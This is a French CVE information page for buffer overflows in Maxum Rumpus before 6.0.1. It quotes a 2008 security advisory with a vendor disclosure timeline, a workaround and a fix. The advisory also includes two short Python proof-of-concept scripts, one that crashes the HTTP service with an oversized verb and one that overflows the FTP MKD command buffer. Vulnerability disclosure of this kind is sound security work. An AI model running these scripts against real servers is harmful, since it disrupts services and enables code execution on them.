Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Multiple buffer overflows in Rumpus before 6.0.1 allow remote attackers to (1) cause a denial of service (segmentation fault) via a long HTTP verb in the HTTP component; and allow remote authenticated users to execute arbitrary code via a long argument to the (2) MKD, (3) XMKD, (4) RMD, and other unspecified commands in the FTP component.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9 | AV:N/AC:L/Au:S/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 7314
Date de publication : 2008-11-30 23h00 +00:00
Auteur : BLUE MOON
EDB Vérifié : Yes
BLUE MOON SECURITY ADVISORY 2008-09
===================================
:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1
Description
-----------
Rumpus turns any Mac into a file transfer server.
Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules.
The first allows an unauthenticated user to crash Rumpus. The later may result in arbitrary
code execution under superuser privilege.
The overflow in HTTP component is caused by the lack of boundary check when parsing for HTTP
action verb (GET, POST, PUT, etc.). If the verb is exactly 2908-byte long, the server runs into
a segmentation fault and crashes. A manual restart is required. It has been observed that this
problem occurs at other verb lengths too. The vulnerability is rated at moderate severity for the
lost of service.
The overflow in FTP component is also caused by the lack of length check when parsing FTP commands
that take argument such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the argument
is ``strcpy`` to an internal buffer. This buffer is 1024-byte long. When the passed-in argument is
longer than 1046 bytes, the instruction pointer will be overwritten. This allows a successful attack
to run arbitrary code under the privilege of a superuser (root) by default. Though authorization is
required to exploit this security bug, the vulnerability is rated at critical severity because the FTP
daemon could be allowing anonymous access.
Workaround
----------
There is no workaround the first bug.
Disable ANONYMOUS and only allow trusted users to use FTP.
Fix
---
Maxum has released Rumpus v6.0.1 which addressed these bugs.
Disclosure
----------
Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.
:Initial vendor contact:
November 28, 2008: Initial contact sent to support@maxum.com
:Vendor response:
November 28, 2008: John requested further communications to be sent to the same address.
:Further communication:
November 28, 2008: Technical details and request for regular update of a patch sent to the vendor.
November 29, 2008: Vendor thanked for the bug report and planned to release v6.0.1 on Monday, December 01.
December 01, 2008: Vendor released 6.0.1 and posted release note at http://www.maxum.com/Rumpus/News601.html.
:Public disclosure: December 01, 2008
:Exploit code:
For the vulnerability in HTTP component::
from socket import socket, AF_INET, SOCK_STREAM
host = "192.168.1.12"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send('z' * 2908 + '\n\n')
s.recv(1024)
s.close()
For the vulnerability in FTP component::
from socket import socket, AF_INET, SOCK_STREAM
host = "192.168.1.12"
port = 21
user = "regular"
pass_ = "training"
commands = [
'user regular\n',
'pass training\n',
'mkd ' + 'z' * 1046 + 'abcd\n'
]
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
for line in commands:
s.send(line)
s.recv(1024)
s.close()
Disclaimer
----------
The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd
disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular
purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd
reserves the right to change or update this notice at any time.
# milw0rm.com [2008-12-01]
Products Mentioned
Configuraton 0
Maxum>>Rumpus >> Version To (including) 6.0
- Maxum>>Rumpus >> Version - (Open CPE detail)
Références
http://www.securityfocus.com/archive/1/498786/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://archives.neohapsis.com/archives/fulldisclosure/2008-12/0007.html
Tags : mailing-list, x_refsource_FULLDISC
Tags : mailing-list, x_refsource_FULLDISC
